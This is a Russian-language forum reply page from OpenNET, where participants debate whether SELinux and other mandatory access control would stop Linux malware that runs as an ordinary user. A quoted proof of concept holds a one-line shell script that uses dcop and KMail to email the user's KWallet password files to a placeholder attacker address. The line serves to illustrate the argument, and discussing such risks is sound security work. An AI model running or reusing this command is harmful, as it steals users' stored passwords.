The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



Индекс форумов
Составление сообщения

Исходное сообщение
"Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"
Отправлено sHaggY_caT, 15-Июн-10 10:44 
>[оверквотинг удален]
>>
>>Если Вы помните, в похожей теме я высказывала аналогичную мысль (про sh-вирусы),
>>однако, Вы забываете о наличии MAC под Linux: тот же SELinux,
>>если корректно настроен, не даст ничего сделать любому протрояненному процессу, вроде
>>Postfix, если процесс работает не под рутом.
>
>PoC №1:
>
>#!/bin/sh
>dcop kmail MailTransportServiceIface sendMessage '<me@domain>' '<bugster@evil.xxx>' '' '' 'Stupid man passwords' 'All this shit' "`echo ${KDEHOME:-~/.kde}/share/apps/kwallet/* | sed -e 's/ /:/g'`"

1. dcop уже в прошлом, как им пользовались, уже не помню :)
2. что-то мне подсказывает, что штатный способ обращения к kdewallet другой, а, значит, будет пресечено SELinux

>PoC №2:

Вырубится SELinux еще на попытке записать в /tmp

>[оверквотинг удален]
>>дело самого ближайшего будущего, так же не стоит забывать о том,
>>что большинство эсплойтов и вирусов будет запускаться с привелегиями юзера/браузера, а,
>>значит, эффективно пресекаться MAC, и изолироваться Cgroups(поспамить процессу просто не дадут!)
>
>Самые опасные с точки зрения последствий зловреды прекрасно чувствуют себя под юзером.
>Ведь самое ценное что: а) пользовательские данные (пароли, документы, статистика, на
>худой конец); б) возможность что-то выполнять от имени вроде как аутентичного
>пользователя. А контейнеры сами по себе тоже не панацея — сколько
>уязвимостей, дающих порой возможности более богатые, чем root (!), уже понаходили
>в системах виртуализации?..

опять же, MAC решает :)

>Если развитие MacOS X будет идти теми же темпами, ситуация с ней
>скоро (в течение пары лет) «исправится». ;)

Зачем? Если так удобно клепать ботнеты на Windows?

 

Ваше сообщение
Имя*:
EMail:
Для отправки ответов на email укажите знак ! перед адресом, например, !user@host.ru (!! - не показывать email).
Более тонкая настройка отправки ответов производится в профиле зарегистрированного участника форума.
Заголовок*:
Сообщение*:
  Введите код, изображенный на картинке: КОД
 
При общении не допускается: неуважительное отношение к собеседнику, хамство, унизительное обращение, ненормативная лексика, переход на личности, агрессивное поведение, обесценивание собеседника, провоцирование флейма голословными и заведомо ложными заявлениями. Не отвечайте на сообщения, явно нарушающие правила - удаляются не только сами нарушения, но и все ответы на них. Лог модерирования.



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру